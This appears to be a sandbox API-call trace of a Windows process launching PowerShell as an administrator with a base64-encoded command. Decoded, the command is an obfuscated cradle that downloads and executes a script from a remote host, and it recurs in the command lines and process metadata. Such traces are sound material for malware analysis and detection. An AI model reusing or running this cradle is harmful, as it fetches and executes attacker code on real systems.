	[0748.370] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.370] SetErrorMode (uMode=0x1) returned 0x1
	[0748.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0748.370] SetErrorMode (uMode=0x1) returned 0x1
	[0748.371] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.371] SetErrorMode (uMode=0x1) returned 0x1
	[0748.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0748.371] SetErrorMode (uMode=0x1) returned 0x1
	[0748.371] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.372] SetErrorMode (uMode=0x1) returned 0x1
	[0748.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0748.372] SetErrorMode (uMode=0x1) returned 0x1
	[0748.372] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.372] SetErrorMode (uMode=0x1) returned 0x1
	[0748.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0748.373] SetErrorMode (uMode=0x1) returned 0x1
	[0748.373] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.373] SetErrorMode (uMode=0x1) returned 0x1
	[0748.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0748.373] SetErrorMode (uMode=0x1) returned 0x1
	[0748.373] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.374] SetErrorMode (uMode=0x1) returned 0x1
	[0748.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0748.374] SetErrorMode (uMode=0x1) returned 0x1
	[0748.374] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.374] SetErrorMode (uMode=0x1) returned 0x1
	[0748.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0748.375] SetErrorMode (uMode=0x1) returned 0x1
	[0748.375] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.375] SetErrorMode (uMode=0x1) returned 0x1
	[0748.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0748.375] SetErrorMode (uMode=0x1) returned 0x1
	[0748.376] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.376] SetErrorMode (uMode=0x1) returned 0x1
	[0748.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0748.376] SetErrorMode (uMode=0x1) returned 0x1
	[0748.376] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.376] SetErrorMode (uMode=0x1) returned 0x1
	[0748.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0748.377] SetErrorMode (uMode=0x1) returned 0x1
	[0748.377] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.377] SetErrorMode (uMode=0x1) returned 0x1
	[0748.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0748.378] SetErrorMode (uMode=0x1) returned 0x1
	[0748.378] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.378] SetErrorMode (uMode=0x1) returned 0x1
	[0748.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0748.378] SetErrorMode (uMode=0x1) returned 0x1
	[0748.378] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.379] SetErrorMode (uMode=0x1) returned 0x1
	[0748.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0748.379] SetErrorMode (uMode=0x1) returned 0x1
	[0748.379] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.379] SetErrorMode (uMode=0x1) returned 0x1
	[0748.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0748.380] SetErrorMode (uMode=0x1) returned 0x1
	[0748.380] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x1b7960e0
	[0748.381] FindNextFileW (in: hFindFile=0x1b7960e0, lpFindFileData=0x1c73da30 | out: lpFindFileData=0x1c73da30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0748.381] FindClose (in: hFindFile=0x1b7960e0 | out: hFindFile=0x1b7960e0) returned 1
	[0748.381] SetErrorMode (uMode=0x1) returned 0x1
	[0748.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c73db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0748.383] SetErrorMode (uMode=0x1) returned 0x1
	[0748.383] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c73dd50 | out: lpFileInformation=0x1c73dd50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0748.383] SetErrorMode (uMode=0x1) returned 0x1
	[0748.384] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0748.384] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0748.384] CoTaskMemFree (pv=0x31a530) 
	[0748.386] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0748.386] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0748.386] CoTaskMemFree (pv=0x31a530) 
	[0748.389] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0748.389] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0748.389] CoTaskMemFree (pv=0x31a530) 
	[0749.568] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0749.568] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0749.568] CoTaskMemFree (pv=0x31a530) 
	[0749.581] CoTaskMemAlloc (cb=0x3b) returned 0x1b7d5100
	[0749.581] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c73df38, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c73df38) returned 0x4550
	[0749.582] CoTaskMemFree (pv=0x1b7d5100) 
	[0749.586] GetConsoleWindow () returned 0x10408
	[0749.595] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0749.595] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0749.595] CoTaskMemFree (pv=0x31a530) 
	[0749.596] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0749.596] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0749.596] CoTaskMemFree (pv=0x31a530) 
	[0750.863] CoTaskMemAlloc (cb=0x104) returned 0x31a530
	[0750.863] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x31a530, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0750.863] CoTaskMemFree (pv=0x31a530) 
	[0750.866] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c73df80 | out: pNumArgs=0x1c73df80) returned 0x29fce0*=""
	[0750.867] lstrlenW (lpString="-EncodedCommand") returned 15
	[0750.868] CoTaskMemAlloc (cb=0x22) returned 0x1b7cd800
	[0750.868] RtlMoveMemory (in: Destination=0x1b7cd800, Source=0x29fd02, Length=0x20 | out: Destination=0x1b7cd800) 
	[0750.868] CoTaskMemFree (pv=0x1b7cd800) 
	[0750.868] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0750.868] CoTaskMemAlloc (cb=0x2f4) returned 0x1b7db430
	[0750.868] RtlMoveMemory (in: Destination=0x1b7db430, Source=0x29fd22, Length=0x2f2 | out: Destination=0x1b7db430) 
	[0750.868] CoTaskMemFree (pv=0x1b7db430) 
	[0750.869] LocalFree (hMem=0x29fce0) returned 0x0
	[0750.870] CoTaskMemAlloc (cb=0x804) returned 0x1b7dc660
	[0750.870] GetConsoleTitleW (in: lpConsoleTitle=0x1b7dc660, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0750.870] CoTaskMemFree (pv=0x1b7dc660) 
	[0750.879] CoTaskMemAlloc (cb=0x38e) returned 0x29fce0
	[0750.880] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c73dee0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2f68110 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2f68110*(hProcess=0x338, hThread=0x394, dwProcessId=0x2024, dwThreadId=0x2028)) returned 1
	[0751.387] CoTaskMemFree (pv=0x29fce0) 
	[0751.389] CloseHandle (hObject=0x394) returned 1
	[0751.389] CoTaskMemAlloc (cb=0x3b) returned 0x1b7d5100
	[0751.389] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c73df88, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c73df88) returned 0x4550
	[0751.398] CoTaskMemFree (pv=0x1b7d5100) 
	[0751.401] GetCurrentProcess () returned 0xffffffffffffffff
	[0751.401] GetCurrentProcess () returned 0xffffffffffffffff
	[0751.401] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x338, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c73e068, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c73e068*=0x394) returned 1

Process:
	id = "52"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x700f7000"
	os_pid = "0xe94"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 296
	os_tid = 0xe98

	[0587.152] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0593.052] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0593.053] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0593.053] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0593.053] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0608.821] GetVersionExW (in: lpVersionInformation=0x14d8a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14d8a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0608.824] GetVersionExW (in: lpVersionInformation=0x14d8a0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14d8a0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0608.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
